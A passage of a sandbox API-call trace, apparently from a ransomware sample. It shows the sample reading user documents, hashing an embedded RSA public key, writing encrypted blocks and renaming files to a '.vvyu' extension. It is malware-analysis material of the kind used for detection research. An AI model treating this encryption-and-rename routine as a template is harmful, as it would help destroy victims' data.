[0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a120 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0195.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f120 | out: hHeap=0x6a0000) returned 1 [0195.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.129] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x75f7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x75f7, lpOverlapped=0x0) returned 1 [0195.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.130] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x75fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.130] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.132] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.133] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.133] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.133] CloseHandle (hObject=0x52c) returned 1 [0195.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d2cc80 [0195.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.135] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\Rt8G.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\rt8g.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\Rt8G.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\rt8g.pptx.vvyu")) returned 1 [0195.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.138] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0195.142] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e01f40, ftCreationTime.dwHighDateTime=0x1d89e58, ftLastAccessTime.dwLowDateTime=0x2563e950, ftLastAccessTime.dwHighDateTime=0x1d8a71b, ftLastWriteTime.dwLowDateTime=0x2563e950, ftLastWriteTime.dwHighDateTime=0x1d8a71b, nFileSizeHigh=0x0, nFileSizeLow=0x14cb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TdPk.ots", cAlternateFileName="")) returned 1 [0195.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0195.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.142] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\TdPk.ots") returned=".ots" [0195.142] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\TdPk.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\tdpk.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.143] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=85176) returned 1 [0195.143] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.146] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x14c92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.146] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.148] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.148] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14cb8, lpOverlapped=0x0) returned 1 [0195.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.150] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0195.151] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.151] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.151] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.151] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.151] GetLastError () returned 0x0 [0195.151] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.151] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0195.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.152] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.152] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.152] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14cc0) returned 0x2d49778 [0195.153] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f120 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f168 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.154] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a090 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.157] GetCurrentThreadId () returned 0x264 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46870 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.157] GetCurrentThreadId () returned 0x264 [0195.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.161] RtlAllocateHeap 